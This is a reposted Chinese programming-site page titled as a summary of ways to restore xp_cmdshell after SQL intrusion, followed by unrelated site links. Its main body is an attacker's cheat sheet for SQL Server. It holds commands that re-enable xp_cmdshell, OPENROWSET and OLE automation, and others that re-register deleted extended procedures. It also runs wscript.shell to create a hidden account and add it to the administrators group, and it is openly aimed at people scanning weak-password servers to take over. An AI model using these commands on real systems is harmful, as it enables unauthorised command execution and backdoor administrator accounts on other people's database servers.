位置: 编程技术 - 正文

SQL入侵恢复xp_cmdshell方法总结

编辑:rootadmin
SQL入侵恢复xp_cmdshell方法总结 sql server 下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; SQL开启'OPENROWSET'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; SQL开启'sp_oacreate'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 突破SA的各种困难 常见情况恢复执行xp_cmdshell 1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 2 无法装载 DLL xpsql.dll 或该DLL所引用的某一 DLL。原因(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 3 无法在库 xpweb.dll 中找到函数 xp_cmdshell。原因: (找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb.dll' 然后按F5键命令执行完毕 四.终极方法. 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net localgroup administrators dell /add' xp或server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net localgroup administrators dell /add' -------------- xp_cmdshell新的恢复办法 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole.dll") dbcc addextendedproc ("xp_cmdshell","xplog.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystemxplog.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell ---------------- 删除sql危险存储: /*不狐 附上恢复扩展存储过程的办法 先恢复sp_addextendedproc,语句如下: SQL代码: 再恢复以上所有扩展存储过程 SQL代码: SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 经常扫SQL弱口令肉鸡的朋友应该遇见过这样的问题 ! 接下来我们用SQL语句搞定他 分析器执行的语句: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE

推荐整理分享SQL入侵恢复xp_cmdshell方法总结,希望有所帮助,仅作参考,欢迎阅读内容。

SQL入侵恢复xp_cmdshell方法总结

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver 函数、存储过程、游标与事务模板 1.标量函数:结果为一个单一的值,可包含逻辑处理过程。其中不能用getdate()之类的不确定性系统函数.--标量值函数--==============================================

ADO.NET EF中的实体修改方法 1.传统修改模式,看下列代码using(NorthwindEntitiescontext=newNorthwindEntities()){Regionregion=context.Region.FirstOrDefault(v=v.RegionID==4);region.RegionDescription="Test";context.SaveCha

sqlserver 聚集索引和非聚集索引实例 createdatabasemyIndexDemogousemyIndexDemogocreatetableABC(Aintnotnull,Bchar(),Cvarchar())goinsertintoABCselect1,'B','C'unionselect5,'B','C'unionselect7,'B','C'unionselect9,'B','C'goselect*fromABC-

标签: SQL入侵恢复xp_cmdshell方法总结

本文链接地址:https://www.jiuchutong.com/biancheng/349165.html 转载请保留说明!

上一篇:世界杯猜想活动的各类榜单的SQL语句小结(世界杯猜测)

下一篇:sqlserver 函数、存储过程、游标与事务模板(sqlserver函数大全)

  • PHP精确计算功能示例(php 计算)

    PHP精确计算功能示例(php 计算)

  • DB2专家王云谈商业智能BI

    DB2专家王云谈商业智能BI

  • Linux中的压缩软件7-zip的使用教程(linux 压缩rar)

    Linux中的压缩软件7-zip的使用教程(linux 压缩rar)

  • Python实现一个转存纯真IP数据库的脚本分享(python转换语句)

    Python实现一个转存纯真IP数据库的脚本分享(python转换语句)

  • jQuery mobile类库使用时加载导航历史的方法简介(jquery库文件)

    jQuery mobile类库使用时加载导航历史的方法简介(jquery库文件)

  • JQuery中Ajax()的data参数类型实例分析

    JQuery中Ajax()的data参数类型实例分析

  • 使用jQuery给input标签设置默认值

    使用jQuery给input标签设置默认值

  • 增值税税控系统产品及维护服务价格
  • 农产品减免税政策最新
  • 出差补贴需要纳税吗
  • 物业公司要交税吗?
  • 什么是价税分离的原因
  • 礼品的进项税能抵扣吗
  • 移动平均加权法是什么意思
  • 以前年度损益调整在借方是什么意思
  • 过了汇算清缴期后发现错误
  • 一次性发放年终奖怎么税务筹划
  • 应缴纳的增值税计算公式
  • 工程施工计入资产负债表
  • 工会费个税税前扣除标准
  • 开发票税前税后
  • 普通商户怎么开小票
  • 公司收款收据
  • 公司向贷款公司贷款做账分录
  • 案例分析房租完税证明怎么入账?
  • 企业取得的信托计划分红缴企业所得税吗
  • 电子发票能不能作废重开
  • 简易计税核算方法有哪些
  • 一般纳税人能开普票吗,几个点
  • 人力资源外包服务收费标准
  • 免交的增值税计入什么科目
  • 企业所得税视同销售的捐赠扣除
  • 商业承兑汇票风险
  • 工程施工纳税
  • 体育用品怎么才能买到
  • 税前利润弥补亏损
  • 个人缴付的年金是什么
  • 修改远程桌面端
  • 商品售价有规定吗
  • 增值税电子发票有什么用
  • uniapp获取input的值
  • 无序树有几种
  • 发票差额怎样做分录
  • 路由器怎么重置网络
  • 个人销售住房是否免征土地增值税
  • ChatGPT5是否会影响人类的发展和工作?
  • HTML+CSS+JS+Jquery+练手项目+...合集(前端学习必备,持续更新中...)
  • 餐饮固定成本怎么算的
  • mysql的命名规则
  • 预计资产负债表和预计利润表构成了整个财务预算
  • 信用减值损失是什么项目
  • 白酒消费税计税价格由谁核定
  • 年末已经结账了怎么入账
  • 非营利组织也被称为?
  • 处理废旧材料会计分录
  • 其他应收款科目余额在贷方表示什么
  • MSSQL 2008 自动备份数据库的设置方法
  • 取得虚开增值税专用发票罪量刑标准
  • 房租收不回来会计分录
  • 如何在科目余额表中查询给另一家公司付了多少钱
  • 大金额维修费用怎么入账
  • 交易性金融资产的账务处理
  • 火车票抵扣进项税怎么申报
  • 预收账款账务处理流程图
  • 食堂的电费能分两次交吗
  • mysql死锁的情况
  • 如何将windows安装到u盘
  • redhat linux6.5安装教程
  • shell 写入文本
  • opengl示例
  • jquery validate demo 基础
  • jquery基本操作
  • unity里面如何删除一个项目
  • JavaScript function函数种类详解
  • viewstock
  • listview item
  • 简单阐述javascript的主要作用
  • typescript的缺点
  • Python的内置字典数据类型为___
  • python的urllib
  • 怎么看网页的编码格式
  • 社保在税务系统交,有何用意
  • 深圳税务忘记密码
  • 开票软件提示连接服务器失败怎么办
  • 个体诊所可以申请医保报销吗
  • 个人的稿酬所得采用什么税率
  • 北京市朝阳区地税
    • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设